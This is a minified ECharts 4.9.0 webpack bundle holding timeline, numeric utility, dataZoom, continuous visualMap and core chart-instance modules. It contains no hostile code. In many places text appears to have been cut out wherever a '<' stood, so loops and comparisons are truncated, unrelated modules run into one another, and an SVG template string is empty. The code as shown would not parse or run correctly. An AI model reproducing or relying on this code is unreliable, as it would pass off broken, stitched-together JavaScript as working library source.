r=i.tickValue,s=o.getItemModel(r),l=s.getModel("label"),u=s.getModel("emphasis.label"),c=n.dataToCoord(i.tickValue),h=new a.Text({position:[c,0],rotation:e.labelRotation-e.rotation,onclick:m(this._changeTimeline,this,r),silent:!1});a.setTextStyle(h.style,l,{text:i.formattedLabel,textAlign:e.labelAlign,textVerticalAlign:e.labelBaseline}),t.add(h),a.setHoverStyle(h,a.setTextStyle({},u))}),this)}},_renderControl:function(e,t,n,i){var r=e.controlSize,o=e.rotation,s=i.getModel("controlStyle").getItemStyle(),l=i.getModel("emphasis.controlStyle").getItemStyle(),u=[0,-r/2,r,r],c=i.getPlayState(),h=i.get("inverse",!0);function d(e,n,c,h){if(e){var d={position:e,origin:[r/2,0],rotation:h?-o:0,rectHover:!0,style:s,onclick:c},f=x(i,n,u,d);t.add(f),a.setHoverStyle(f,l)}}d(e.nextBtnPosition,"controlStyle.nextIcon",m(this._changeTimeline,this,h?"-":"+")),d(e.prevBtnPosition,"controlStyle.prevIcon",m(this._changeTimeline,this,h?"+":"-")),d(e.playPosition,"controlStyle."+(c?"stopIcon":"playIcon"),m(this._handlePlayClick,this,!c),!0)},_renderCurrentPointer:function(e,t,n,i){var r=i.getData(),o=i.getCurrentIndex(),a=r.getItemModel(o).getModel("checkpointStyle"),s=this,l={onCreate:function(e){e.draggable=!0,e.drift=m(s._handlePointerDrag,s),e.ondragend=m(s._handlePointerDragend,s),k(e,o,n,i,!0)},onUpdate:function(e){k(e,o,n,i)}};this._currentPointer=w(a,a,this._mainGroup,{},this._currentPointer,l)},_handlePlayClick:function(e){this._clearTimer(),this.api.dispatchAction({type:"timelinePlayChange",playState:e,from:this.uid})},_handlePointerDrag:function(e,t,n){this._clearTimer(),this._pointerChangeTimeline([n.offsetX,n.offsetY])},_handlePointerDragend:function(e){this._pointerChangeTimeline([e.offsetX,e.offsetY],!0)},_pointerChangeTimeline:function(e,t){var n=this._toAxisCoord(e)[0],i=this._axis,r=f.asc(i.getExtent().slice());n>r[1]&&(n=r[1]),nl)r.f(e,n=i[l++],t[n]);return e}},3842:function(e,t,n){var i=n("6d8b"),r=1e-4;function o(e){return e.replace(/^\s+|\s+$/g,"")}function a(e,t,n,i){var r=t[1]-t[0],o=n[1]-n[0];if(0===r)return 0===o?n[0]:(n[0]+n[1])/2;if(i)if(r>0){if(e<=t[0])return n[0];if(e>=t[1])return n[1]}else{if(e>=t[0])return n[0];if(e<=t[1])return n[1]}else{if(e===t[0])return n[0];if(e===t[1])return n[1]}return(e-t[0])/r*o+n[0]}function s(e,t){switch(e){case"center":case"middle":e="50%";break;case"left":case"top":e="0%";break;case"right":case"bottom":e="100%";break}return"string"===typeof e?o(e).match(/%$/)?parseFloat(e)/100*t:parseFloat(e):null==e?NaN:+e}function l(e,t,n){return null==t&&(t=10),t=Math.min(Math.max(0,t),20),e=(+e).toFixed(t),n?e:+e}function u(e){return e.sort((function(e,t){return e-t})),e}function c(e){if(e=+e,isNaN(e))return 0;var t=1,n=0;while(Math.round(e*t)/t!==e)t*=10,n++;return n}function h(e){var t=e.toString(),n=t.indexOf("e");if(n>0){var i=+t.slice(n+1);return i<0?-i:0}var r=t.indexOf(".");return r<0?0:t.length-1-r}function d(e,t){var n=Math.log,i=Math.LN10,r=Math.floor(n(e[1]-e[0])/i),o=Math.round(n(Math.abs(t[1]-t[0]))/i),a=Math.min(Math.max(-r+o,0),20);return isFinite(a)?a:20}function f(e,t,n){if(!e[t])return 0;var r=i.reduce(e,(function(e,t){return e+(isNaN(t)?0:t)}),0);if(0===r)return 0;var o=Math.pow(10,n),a=i.map(e,(function(e){return(isNaN(e)?0:e)/r*o*100})),s=100*o,l=i.map(a,(function(e){return Math.floor(e)})),u=i.reduce(l,(function(e,t){return e+t}),0),c=i.map(a,(function(e,t){return e-l[t]}));while(uh&&(h=c[f],d=f);++l[d],c[d]=0,++u}return l[t]/o}var p=9007199254740991;function g(e){var t=2*Math.PI;return(e%t+t)%t}function m(e){return e>-r&&e=10&&t++,t}function x(e,t){var n,i=b(e),r=Math.pow(10,i),o=e/r;return n=t?o<1.5?1:o<2.5?2:o<4?3:o<7?5:10:o<1?1:o<2?2:o<3?3:o<5?5:10,e=n*r,i>=-20?+e.toFixed(i<0?-i:0):e}function w(e,t){var n=(e.length-1)*t+1,i=Math.floor(n),r=+e[i-1],o=n-i;return o?r+o*(e[i]-r):r}function k(e){e.sort((function(e,t){return s(e,t,0)?-1:1}));for(var t=-1/0,n=1,i=0;i=0}t.linearMap=a,t.parsePercent=s,t.round=l,t.asc=u,t.getPrecision=c,t.getPrecisionSafe=h,t.getPixelPrecision=d,t.getPercentWithPrecision=f,t.MAX_SAFE_INTEGER=p,t.remRadian=g,t.isRadianAroundZero=m,t.parseDate=y,t.quantity=_,t.quantityExponent=b,t.nice=x,t.quantile=w,t.reformIntervals=k,t.isNumeric=S},"38a2":function(e,t,n){var i=n("2b17"),r=i.retrieveRawValue,o=n("eda2"),a=o.getTooltipMarker,s=o.formatTpl,l=n("e0d3"),u=l.getTooltipRenderMode,c=/\{@(.+?)\}/g,h={getDataParams:function(e,t){var n=this.getData(t),i=this.getRawValue(e,t),r=n.getRawIndex(e),o=n.getName(e),s=n.getRawDataItem(e),l=n.getItemVisual(e,"color"),c=n.getItemVisual(e,"borderColor"),h=this.ecModel.getComponent("tooltip"),d=h&&h.get("renderMode"),f=u(d),p=this.mainType,g="series"===p,m=n.userOutput;return{componentType:p,componentSubType:this.subType,componentIndex:this.componentIndex,seriesType:g?this.subType:null,seriesIndex:this.seriesIndex,seriesId:g?this.id:null,seriesName:g?this.name:null,name:o,dataIndex:r,data:s,dataType:t,value:i,color:l,borderColor:c,dimensionNames:m?m.dimensionNames:null,encode:m?m.encode:null,marker:a({color:l,renderMode:f}),$vars:["seriesName","name","value"]}},getFormattedLabel:function(e,t,n,i,o){t=t||"normal";var a=this.getData(n),l=a.getItemModel(e),u=this.getDataParams(e,n);null!=i&&u.value instanceof Array&&(u.value=u.value[i]);var h=l.get("normal"===t?[o||"label","formatter"]:[t,o||"label","formatter"]);if("function"===typeof h)return u.status=t,u.dimensionIndex=i,h(u);if("string"===typeof h){var d=s(h,u);return d.replace(c,(function(t,n){var i=n.length;return"["===n.charAt(0)&&"]"===n.charAt(i-1)&&(n=+n.slice(1,i-1)),r(a,e,n)}))}},getRawValue:function(e,t){return r(this.getData(t),e)},formatTooltip:function(){}};e.exports=h},3901:function(e,t,n){var i=n("282b"),r=i([["lineWidth","width"],["stroke","color"],["opacity"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["shadowColor"]]),o={getLineStyle:function(e){var t=r(this,e);return t.lineDash=this.getLineDash(t.lineWidth),t},getLineDash:function(e){null==e&&(e=1);var t=this.get("type"),n=Math.max(e,2),i=4*e;return"solid"!==t&&null!=t&&("dashed"===t?[i,i]:[n,n])}};e.exports=o},"392f":function(e,t,n){var i=n("6d8b"),r=i.inherits,o=n("19eb"),a=n("9850");function s(e){o.call(this,e),this._displayables=[],this._temporaryDisplayables=[],this._cursor=0,this.notClear=!0}s.prototype.incremental=!0,s.prototype.clearDisplaybles=function(){this._displayables=[],this._temporaryDisplayables=[],this._cursor=0,this.dirty(),this.notClear=!1},s.prototype.addDisplayable=function(e,t){t?this._temporaryDisplayables.push(e):this._displayables.push(e),this.dirty()},s.prototype.addDisplayables=function(e,t){t=t||!1;for(var n=0;nc)if(s=l[c++],s!=s)return!0}else for(;u>c;c++)if((e||c in l)&&l[c]===n)return e||c||0;return!e&&-1}}},"3a56":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("3eba")),o=n("6d8b"),a=n("22d1"),s=n("e0d3"),l=n("50e5"),u=n("cc39"),c=o.each,h=l.eachAxisDim,d=r.extendComponentModel({type:"dataZoom",dependencies:["xAxis","yAxis","zAxis","radiusAxis","angleAxis","singleAxis","series"],defaultOption:{zlevel:0,z:4,orient:null,xAxisIndex:null,yAxisIndex:null,filterMode:"filter",throttle:null,start:0,end:100,startValue:null,endValue:null,minSpan:null,maxSpan:null,minValueSpan:null,maxValueSpan:null,rangeMode:null},init:function(e,t,n){this._dataIntervalByAxis={},this._dataInfo={},this._axisProxies={},this.textStyleModel,this._autoThrottle=!0,this._rangePropMode=["percent","percent"];var i=f(e);this.settledOption=i,this.mergeDefaultAndTheme(e,n),this.doInit(i)},mergeOption:function(e){var t=f(e);o.merge(this.option,e,!0),o.merge(this.settledOption,t,!0),this.doInit(t)},doInit:function(e){var t=this.option;a.canvasSupported||(t.realtime=!1),this._setDefaultThrottle(e),p(this,e);var n=this.settledOption;c([["start","startValue"],["end","endValue"]],(function(e,i){"value"===this._rangePropMode[i]&&(t[e[0]]=n[e[0]]=null)}),this),this.textStyleModel=this.getModel("textStyle"),this._resetTarget(),this._giveAxisProxies()},_giveAxisProxies:function(){var e=this._axisProxies;this.eachTargetAxis((function(t,n,i,r){var o=this.dependentModels[t.axis][n],a=o.__dzAxisProxy||(o.__dzAxisProxy=new u(t.name,n,this,r));e[t.name+"_"+n]=a}),this)},_resetTarget:function(){var e=this.option,t=this._judgeAutoMode();h((function(t){var n=t.axisIndex;e[n]=s.normalizeToArray(e[n])}),this),"axisIndex"===t?this._autoSetAxisIndex():"orient"===t&&this._autoSetOrient()},_judgeAutoMode:function(){var e=this.option,t=!1;h((function(n){null!=e[n.axisIndex]&&(t=!0)}),this);var n=e.orient;return null==n&&t?"orient":t?void 0:(null==n&&(e.orient="horizontal"),"axisIndex")},_autoSetAxisIndex:function(){var e=!0,t=this.get("orient",!0),n=this.option,i=this.dependentModels;if(e){var r="vertical"===t?"y":"x";i[r+"Axis"].length?(n[r+"AxisIndex"]=[0],e=!1):c(i.singleAxis,(function(i){e&&i.get("orient",!0)===t&&(n.singleAxisIndex=[i.componentIndex],e=!1)}))}e&&h((function(t){if(e){var i=[],r=this.dependentModels[t.axis];if(r.length&&!i.length)for(var o=0,a=r.length;o0?100:20}},getFirstTargetAxisModel:function(){var e;return h((function(t){if(null==e){var n=this.get(t.axisIndex);n.length&&(e=this.dependentModels[t.axis][n[0]])}}),this),e},eachTargetAxis:function(e,t){var n=this.ecModel;h((function(i){c(this.get(i.axisIndex),(function(r){e.call(t,i,r,this,n)}),this)}),this)},getAxisProxy:function(e,t){return this._axisProxies[e+"_"+t]},getAxisModel:function(e,t){var n=this.getAxisProxy(e,t);return n&&n.getAxisModel()},setRawRange:function(e){var t=this.option,n=this.settledOption;c([["start","startValue"],["end","endValue"]],(function(i){null==e[i[0]]&&null==e[i[1]]||(t[i[0]]=n[i[0]]=e[i[0]],t[i[1]]=n[i[1]]=e[i[1]])}),this),p(this,e)},setCalculatedRange:function(e){var t=this.option;c(["start","startValue","end","endValue"],(function(n){t[n]=e[n]}))},getPercentRange:function(){var e=this.findRepresentativeAxisProxy();if(e)return e.getDataPercentWindow()},getValueRange:function(e,t){if(null!=e||null!=t)return this.getAxisProxy(e,t).getDataValueWindow();var n=this.findRepresentativeAxisProxy();return n?n.getDataValueWindow():void 0},findRepresentativeAxisProxy:function(e){if(e)return e.__dzAxisProxy;var t=this._axisProxies;for(var n in t)if(t.hasOwnProperty(n)&&t[n].hostedBy(this))return t[n];for(var n in t)if(t.hasOwnProperty(n)&&!t[n].hostedBy(this))return t[n]},getRangePropMode:function(){return this._rangePropMode.slice()}});function f(e){var t={};return c(["start","end","startValue","endValue","throttle"],(function(n){e.hasOwnProperty(n)&&(t[n]=e[n])})),t}function p(e,t){var n=e._rangePropMode,i=e.get("rangeMode");c([["start","startValue"],["end","endValue"]],(function(e,r){var o=null!=t[e[0]],a=null!=t[e[1]];o&&!a?n[r]="percent":!o&&a?n[r]="value":i?n[r]=i[r]:o&&(n[r]="percent")}))}var g=d;e.exports=g},"3bbe":function(e,t,n){var i=n("861d");e.exports=function(e){if(!i(e)&&null!==e)throw TypeError("Can't set "+String(e)+" as a prototype");return e}},"3ca3":function(e,t,n){"use strict";var i=n("6547").charAt,r=n("69f3"),o=n("7dd0"),a="String Iterator",s=r.set,l=r.getterFor(a);o(String,"String",(function(e){s(this,{type:a,string:String(e),index:0})}),(function(){var e,t=l(this),n=t.string,r=t.index;return r>=n.length?{value:void 0,done:!0}:(e=i(n,r),t.index+=e.length,{value:e,done:!1})}))},"3cd6":function(e,t,n){var i=n("6d8b"),r=n("48a9"),o=n("607d"),a=n("72b6"),s=n("2306"),l=n("3842"),u=n("ef6a"),c=n("cbb0"),h=n("e0d3"),d=l.linearMap,f=i.each,p=Math.min,g=Math.max,m=12,v=6,y=a.extend({type:"visualMap.continuous",init:function(){y.superApply(this,"init",arguments),this._shapes={},this._dataInterval=[],this._handleEnds=[],this._orient,this._useHandle,this._hoverLinkDataIndices=[],this._dragging,this._hovering},doRender:function(e,t,n,i){i&&"selectDataRange"===i.type&&i.from===this.uid||this._buildView()},_buildView:function(){this.group.removeAll();var e=this.visualMapModel,t=this.group;this._orient=e.get("orient"),this._useHandle=e.get("calculable"),this._resetInterval(),this._renderBar(t);var n=e.get("text");this._renderEndsText(t,n,0),this._renderEndsText(t,n,1),this._updateView(!0),this.renderBackground(t),this._updateView(),this._enableHoverLinkToSeries(),this._enableHoverLinkFromSeries(),this.positionGroup(t)},_renderEndsText:function(e,t,n){if(t){var i=t[1-n];i=null!=i?i+"":"";var r=this.visualMapModel,o=r.get("textGap"),a=r.itemSize,l=this._shapes.barGroup,u=this._applyTransform([a[0]/2,0===n?-o:a[1]+o],l),c=this._applyTransform(0===n?"bottom":"top",l),h=this._orient,d=this.visualMapModel.textStyleModel;this.group.add(new s.Text({style:{x:u[0],y:u[1],textVerticalAlign:"horizontal"===h?"middle":c,textAlign:"horizontal"===h?c:"center",text:i,textFont:d.getFont(),textFill:d.getTextColor()}}))}},_renderBar:function(e){var t=this.visualMapModel,n=this._shapes,r=t.itemSize,o=this._orient,a=this._useHandle,s=c.getItemAlign(t,this.api,r),l=n.barGroup=this._createBarGroup(s);l.add(n.outOfRange=_()),l.add(n.inRange=_(null,a?S(this._orient):null,i.bind(this._dragHandle,this,"all",!1),i.bind(this._dragHandle,this,"all",!0)));var u=t.textStyleModel.getTextRect("国"),h=g(u.width,u.height);a&&(n.handleThumbs=[],n.handleLabels=[],n.handleLabelPoints=[],this._createHandle(l,0,r,h,o,s),this._createHandle(l,1,r,h,o,s)),this._createIndicator(l,r,h,o),e.add(l)},_createHandle:function(e,t,n,r,a){var l=i.bind(this._dragHandle,this,t,!1),u=i.bind(this._dragHandle,this,t,!0),c=_(b(t,r),S(this._orient),l,u);c.position[0]=n[0],e.add(c);var h=this.visualMapModel.textStyleModel,d=new s.Text({draggable:!0,drift:l,onmousemove:function(e){o.stop(e.event)},ondragend:u,style:{x:0,y:0,text:"",textFont:h.getFont(),textFill:h.getTextColor()}});this.group.add(d);var f=["horizontal"===a?r/2:1.5*r,"horizontal"===a?0===t?-1.5*r:1.5*r:0===t?-r/2:r/2],p=this._shapes;p.handleThumbs[t]=c,p.handleLabelPoints[t]=f,p.handleLabels[t]=d},_createIndicator:function(e,t,n,i){var r=_([[0,0]],"move");r.position[0]=t[0],r.attr({invisible:!0,silent:!0}),e.add(r);var o=this.visualMapModel.textStyleModel,a=new s.Text({silent:!0,invisible:!0,style:{x:0,y:0,text:"",textFont:o.getFont(),textFill:o.getTextColor()}});this.group.add(a);var l=["horizontal"===i?n/2:v+3,0],u=this._shapes;u.indicator=r,u.indicatorLabel=a,u.indicatorLabelPoint=l},_dragHandle:function(e,t,n,i){if(this._useHandle){if(this._dragging=!t,!t){var r=this._applyTransform([n,i],this._shapes.barGroup,!0);this._updateInterval(e,r[1]),this._updateView()}t===!this.visualMapModel.get("realtime")&&this.api.dispatchAction({type:"selectDataRange",from:this.uid,visualMapId:this.visualMapModel.id,selected:this._dataInterval.slice()}),t?!this._hovering&&this._clearHoverLinkToSeries():k(this.visualMapModel)&&this._doHoverLinkToSeries(this._handleEnds[e],!1)}},_resetInterval:function(){var e=this.visualMapModel,t=this._dataInterval=e.getSelected(),n=e.getExtent(),i=[0,e.itemSize[1]];this._handleEnds=[d(t[0],n,i,!0),d(t[1],n,i,!0)]},_updateInterval:function(e,t){t=t||0;var n=this.visualMapModel,i=this._handleEnds,r=[0,n.itemSize[1]];u(t,i,r,e,0);var o=n.getExtent();this._dataInterval=[d(i[0],r,o,!0),d(i[1],r,o,!0)]},_updateView:function(e){var t=this.visualMapModel,n=t.getExtent(),i=this._shapes,r=[0,t.itemSize[1]],o=e?r:this._handleEnds,a=this._createBarVisual(this._dataInterval,n,o,"inRange"),s=this._createBarVisual(n,n,r,"outOfRange");i.inRange.setStyle({fill:a.barColor,opacity:a.opacity}).setShape("points",a.barPoints),i.outOfRange.setStyle({fill:s.barColor,opacity:s.opacity}).setShape("points",s.barPoints),this._updateHandle(o,a)},_createBarVisual:function(e,t,n,i){var o={forceState:i,convertOpacityToAlpha:!0},a=this._makeColorGradient(e,o),s=[this.getControllerVisual(e[0],"symbolSize",o),this.getControllerVisual(e[1],"symbolSize",o)],l=this._createBarPoints(n,s);return{barColor:new r(0,0,0,1,a),barPoints:l,handlesColor:[a[0].color,a[a.length-1].color]}},_makeColorGradient:function(e,t){var n=100,i=[],r=(e[1]-e[0])/n;i.push({color:this.getControllerVisual(e[0],"color",t),offset:0});for(var o=1;oe[1])break;i.push({color:this.getControllerVisual(a,"color",t),offset:o/n})}return i.push({color:this.getControllerVisual(e[1],"color",t),offset:1}),i},_createBarPoints:function(e,t){var n=this.visualMapModel.itemSize;return[[n[0]-t[0],e[0]],[n[0],e[0]],[n[0],e[1]],[n[0]-t[1],e[1]]]},_createBarGroup:function(e){var t=this._orient,n=this.visualMapModel.get("inverse");return new s.Group("horizontal"!==t||n?"horizontal"===t&&n?{scale:"bottom"===e?[-1,1]:[1,1],rotation:-Math.PI/2}:"vertical"!==t||n?{scale:"left"===e?[1,1]:[-1,1]}:{scale:"left"===e?[1,-1]:[-1,-1]}:{scale:"bottom"===e?[1,1]:[-1,1],rotation:Math.PI/2})},_updateHandle:function(e,t){if(this._useHandle){var n=this._shapes,i=this.visualMapModel,r=n.handleThumbs,o=n.handleLabels;f([0,1],(function(a){var l=r[a];l.setStyle("fill",t.handlesColor[a]),l.position[1]=e[a];var u=s.applyTransform(n.handleLabelPoints[a],s.getTransform(l,this.group));o[a].setStyle({x:u[0],y:u[1],text:i.formatValueText(this._dataInterval[a]),textVerticalAlign:"middle",textAlign:this._applyTransform("horizontal"===this._orient?0===a?"bottom":"top":"left",n.barGroup)})}),this)}},_showIndicator:function(e,t,n,i){var r=this.visualMapModel,o=r.getExtent(),a=r.itemSize,l=[0,a[1]],u=d(e,o,l,!0),c=this._shapes,h=c.indicator;if(h){h.position[1]=u,h.attr("invisible",!1),h.setShape("points",x(!!n,i,u,a[1]));var f={convertOpacityToAlpha:!0},p=this.getControllerVisual(e,"color",f);h.setStyle("fill",p);var g=s.applyTransform(c.indicatorLabelPoint,s.getTransform(h,this.group)),m=c.indicatorLabel;m.attr("invisible",!1);var v=this._applyTransform("left",c.barGroup),y=this._orient;m.setStyle({text:(n||"")+r.formatValueText(t),textVerticalAlign:"horizontal"===y?v:"middle",textAlign:"horizontal"===y?"center":v,x:g[0],y:g[1]})}},_enableHoverLinkToSeries:function(){var e=this;this._shapes.barGroup.on("mousemove",(function(t){if(e._hovering=!0,!e._dragging){var n=e.visualMapModel.itemSize,i=e._applyTransform([t.offsetX,t.offsetY],e._shapes.barGroup,!0,!0);i[1]=p(g(0,i[1]),n[1]),e._doHoverLinkToSeries(i[1],0<=i[0]&&i[0]<=n[0])}})).on("mouseout",(function(){e._hovering=!1,!e._dragging&&e._clearHoverLinkToSeries()}))},_enableHoverLinkFromSeries:function(){var e=this.api.getZr();this.visualMapModel.option.hoverLink?(e.on("mouseover",this._hoverLinkFromSeriesMouseOver,this),e.on("mouseout",this._hideIndicator,this)):this._clearHoverLinkFromSeries()},_doHoverLinkToSeries:function(e,t){var n=this.visualMapModel,i=n.itemSize;if(n.option.hoverLink){var r=[0,i[1]],o=n.getExtent();e=p(g(r[0],e),r[1]);var a=w(n,o,r),s=[e-a,e+a],l=d(e,r,o,!0),u=[d(s[0],r,o,!0),d(s[1],r,o,!0)];s[0]r[1]&&(u[1]=1/0),t&&(u[0]===-1/0?this._showIndicator(l,u[1],"< ",a):u[1]===1/0?this._showIndicator(l,u[0],"> ",a):this._showIndicator(l,l,"≈ ",a));var f=this._hoverLinkDataIndices,m=[];(t||k(n))&&(m=this._hoverLinkDataIndices=n.findTargetDataIndices(u));var v=h.compressBatches(f,m);this._dispatchHighDown("downplay",c.makeHighDownBatch(v[0],n)),this._dispatchHighDown("highlight",c.makeHighDownBatch(v[1],n))}},_hoverLinkFromSeriesMouseOver:function(e){var t=e.target,n=this.visualMapModel;if(t&&null!=t.dataIndex){var i=this.ecModel.getSeriesByIndex(t.seriesIndex);if(n.isTargetSeries(i)){var r=i.getData(t.dataType),o=r.get(n.getDataDimension(r),t.dataIndex,!0);isNaN(o)||this._showIndicator(o,o)}}},_hideIndicator:function(){var e=this._shapes;e.indicator&&e.indicator.attr("invisible",!0),e.indicatorLabel&&e.indicatorLabel.attr("invisible",!0)},_clearHoverLinkToSeries:function(){this._hideIndicator();var e=this._hoverLinkDataIndices;this._dispatchHighDown("downplay",c.makeHighDownBatch(e,this.visualMapModel)),e.length=0},_clearHoverLinkFromSeries:function(){this._hideIndicator();var e=this.api.getZr();e.off("mouseover",this._hoverLinkFromSeriesMouseOver),e.off("mouseout",this._hideIndicator)},_applyTransform:function(e,t,n,r){var o=s.getTransform(t,r?null:this.group);return s[i.isArray(e)?"applyTransform":"transformDirection"](e,o,n)},_dispatchHighDown:function(e,t){t&&t.length&&this.api.dispatchAction({type:e,batch:t})},dispose:function(){this._clearHoverLinkFromSeries(),this._clearHoverLinkToSeries()},remove:function(){this._clearHoverLinkFromSeries(),this._clearHoverLinkToSeries()}});function _(e,t,n,i){return new s.Polygon({shape:{points:e},draggable:!!n,cursor:t,drift:n,onmousemove:function(e){o.stop(e.event)},ondragend:i})}function b(e,t){return 0===e?[[0,0],[t,0],[t,-t]]:[[0,0],[t,0],[t,t]]}function x(e,t,n,i){return e?[[0,-p(t,g(n,0))],[v,0],[0,p(t,g(i-n,0))]]:[[0,0],[5,-5],[5,5]]}function w(e,t,n){var i=m/2,r=e.get("hoverLinkDataSize");return r&&(i=d(r,t,n,!0)/2),i}function k(e){var t=e.get("hoverLinkOnHandle");return!!(null==t?e.get("realtime"):t)}function S(e){return"vertical"===e?"ns-resize":"ew-resize"}var M=y;e.exports=M},"3eba":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("697e7")),o=n("6d8b"),a=n("41ef"),s=n("22d1"),l=n("04f6"),u=n("1fab"),c=n("7e63"),h=n("843e"),d=n("2039"),f=n("ca98"),p=n("fb05"),g=n("d15d"),m=n("6cb7"),v=n("4f85"),y=n("b12f"),_=n("e887"),b=n("2306"),x=n("e0d3"),w=n("88b3"),k=w.throttle,S=n("fd63"),M=n("b809"),A=n("998c"),C=n("69ff"),T=n("c533"),I=n("f219");n("0352");var D=n("ec34"),L=o.assert,E=o.each,O=o.isFunction,P=o.isObject,R=m.parseClassType,N="4.9.0",z={zrender:"4.3.2"},F=1,V=1e3,B=800,j=900,H=5e3,q=1e3,G=1100,W=2e3,$=3e3,U=3500,Z=4e3,Y=5e3,X={PROCESSOR:{FILTER:V,SERIES_FILTER:B,STATISTIC:H},VISUAL:{LAYOUT:q,PROGRESSIVE_LAYOUT:G,GLOBAL:W,CHART:$,POST_CHART_LAYOUT:U,COMPONENT:Z,BRUSH:Y}},K="__flagInMainProcess",J="__optionUpdated",Q=/^[a-zA-Z0-9_]+$/;function ee(e,t){return function(n,i,r){t||!this._disposed?(n=n&&n.toLowerCase(),u.prototype[e].call(this,n,i,r)):be(this.id)}}function te(){u.call(this)}function ne(e,t,n){n=n||{},"string"===typeof t&&(t=Ee[t]),this.id,this.group,this._dom=e;var i="canvas",a=this._zr=r.init(e,{renderer:n.renderer||i,devicePixelRatio:n.devicePixelRatio,width:n.width,height:n.height});this._throttledZrFlush=k(o.bind(a.flush,a),17);t=o.clone(t);t&&p(t,!0),this._theme=t,this._chartsViews=[],this._chartsMap={},this._componentsViews=[],this._componentsMap={},this._coordSysMgr=new d;var s=this._api=Se(this);function c(e,t){return e.__prio-t.__prio}l(Le,c),l(Te,c),this._scheduler=new C(this,s,Te,Le),u.call(this,this._ecEventProcessor=new Me),this._messageCenter=new te,this._initEvents(),this.resize=o.bind(this.resize,this),this._pendingActions=[],a.animation.on("frame",this._onframe,this),de(a,this),o.setAsPrimitive(this)}te.prototype.on=ee("on",!0),te.prototype.off=ee("off",!0),te.prototype.one=ee("one",!0),o.mixin(te,u);var ie=ne.prototype;function re(e,t,n){if(this._disposed)be(this.id);else{var i,r=this._model,o=this._coordSysMgr.getCoordinateSystems();t=x.parseFinder(r,t);for(var a=0;a0&&e.unfinished);e.unfinished||this._zr.flush()}}},ie.getDom=function(){return this._dom},ie.getZr=function(){return this._zr},ie.setOption=function(e,t,n){if(this._disposed)be(this.id);else{var i;if(P(t)&&(n=t.lazyUpdate,i=t.silent,t=t.notMerge),this[K]=!0,!this._model||t){var r=new f(this._api),o=this._theme,a=this._model=new c;a.scheduler=this._scheduler,a.init(null,null,o,r)}this._model.setOption(e,Ie),n?(this[J]={silent:i},this[K]=!1):(ae(this),oe.update.call(this),this._zr.flush(),this[J]=!1,this[K]=!1,ce.call(this,i),he.call(this,i))}},ie.setTheme=function(){console.error("ECharts#setTheme() is DEPRECATED in ECharts 3.0")},ie.getModel=function(){return this._model},ie.getOption=function(){return this._model&&this._model.getOption()},ie.getWidth=function(){return this._zr.getWidth()},ie.getHeight=function(){return this._zr.getHeight()},ie.getDevicePixelRatio=function(){return this._zr.painter.dpr||window.devicePixelRatio||1},ie.getRenderedCanvas=function(e){if(s.canvasSupported){e=e||{},e.pixelRatio=e.pixelRatio||1,e.backgroundColor=e.backgroundColor||this._model.get("backgroundColor");var t=this._zr;return t.painter.getRenderedCanvas(e)}},ie.getSvgDataURL=function(){if(s.svgSupported){var e=this._zr,t=e.storage.getDisplayList();return o.each(t,(function(e){e.stopAnimation(!0)})),e.painter.toDataURL()}},ie.getDataURL=function(e){if(!this._disposed){e=e||{};var t=e.excludeComponents,n=this._model,i=[],r=this;E(t,(function(e){n.eachComponent({mainType:e},(function(e){var t=r._componentsMap[e.__viewId];t.group.ignore||(i.push(t),t.group.ignore=!0)}))}));var o="svg"===this._zr.painter.getType()?this.getSvgDataURL():this.getRenderedCanvas(e).toDataURL("image/"+(e&&e.type||"png"));return E(i,(function(e){e.group.ignore=!1})),o}be(this.id)},ie.getConnectedDataURL=function(e){if(this._disposed)be(this.id);else if(s.canvasSupported){var t="svg"===e.type,n=this.group,i=Math.min,a=Math.max,l=1/0;if(Re[n]){var u=l,c=l,h=-l,d=-l,f=[],p=e&&e.pixelRatio||1;o.each(Pe,(function(r,s){if(r.group===n){var l=t?r.getZr().painter.getSvgDom().innerHTML:r.getRenderedCanvas(o.clone(e)),p=r.getDom().getBoundingClientRect();u=i(p.left,u),c=i(p.top,c),h=a(p.right,h),d=a(p.bottom,d),f.push({dom:l,left:p.left,top:p.top})}})),u*=p,c*=p,h*=p,d*=p;var g=h-u,m=d-c,v=o.createCanvas(),y=r.init(v,{renderer:t?"svg":"canvas"});if(y.resize({width:g,height:m}),t){var _="";return E(f,(function(e){var t=e.left-u,n=e.top-c;_+=''+e.dom+""})),y.painter.getSvgRoot().innerHTML=_,e.connectedBackgroundColor&&y.painter.setBackgroundColor(e.connectedBackgroundColor),y.refreshImmediately(),y.painter.toDataURL()}return e.connectedBackgroundColor&&y.add(new b.Rect({shape:{x:0,y:0,width:g,height:m},style:{fill:e.connectedBackgroundColor}})),E(f,(function(e){var t=new b.Image({style:{x:e.left*p-u,y:e.top*p-c,image:e.dom}});y.add(t)})),y.refreshImmediately(),v.toDataURL("image/"+(e&&e.type||"png"))}return this.getDataURL(e)}},ie.convertToPixel=o.curry(re,"convertToPixel"),ie.convertFromPixel=o.curry(re,"convertFromPixel"),ie.containPixel=function(e,t){if(!this._disposed){var n,i=this._model;return e=x.parseFinder(i,e),o.each(e,(function(e,i){i.indexOf("Models")>=0&&o.each(e,(function(e){var r=e.coordinateSystem;if(r&&r.containPoint)n|=!!r.containPoint(t);else if("seriesModels"===i){var o=this._chartsMap[e.__viewId];o&&o.containPoint&&(n|=o.containPoint(t,e))}}),this)}),this),!!n}be(this.id)},ie.getVisual=function(e,t){var n=this._model;e=x.parseFinder(n,e,{defaultMainType:"series"});var i=e.seriesModel,r=i.getData(),o=e.hasOwnProperty("dataIndexInside")?e.dataIndexInside:e.hasOwnProperty("dataIndex")?r.indexOfRawIndex(e.dataIndex):null;return null!=o?r.getItemVisual(o,t):r.getVisual(t)},ie.getViewOfComponentModel=function(e){return this._componentsMap[e.__viewId]},ie.getViewOfSeriesModel=function(e){return this._chartsMap[e.__viewId]};var oe={prepareAndUpdate:function(e){ae(this),oe.update.call(this,e)},update:function(e){var t=this._model,n=this._api,i=this._zr,r=this._coordSysMgr,o=this._scheduler;if(t){o.restoreData(t,e),o.performSeriesTasks(t),r.create(t,n),o.performDataProcessorTasks(t,e),le(this,t),r.update(t,n),pe(t),o.performVisualTasks(t,e),ge(this,t,n,e);var l=t.get("backgroundColor")||"transparent";if(s.canvasSupported)i.setBackgroundColor(l);else{var u=a.parse(l);l=a.stringify(u,"rgb"),0===u[3]&&(l="transparent")}ye(t,n)}},updateTransform:function(e){var t=this._model,n=this,i=this._api;if(t){var r=[];t.eachComponent((function(o,a){var 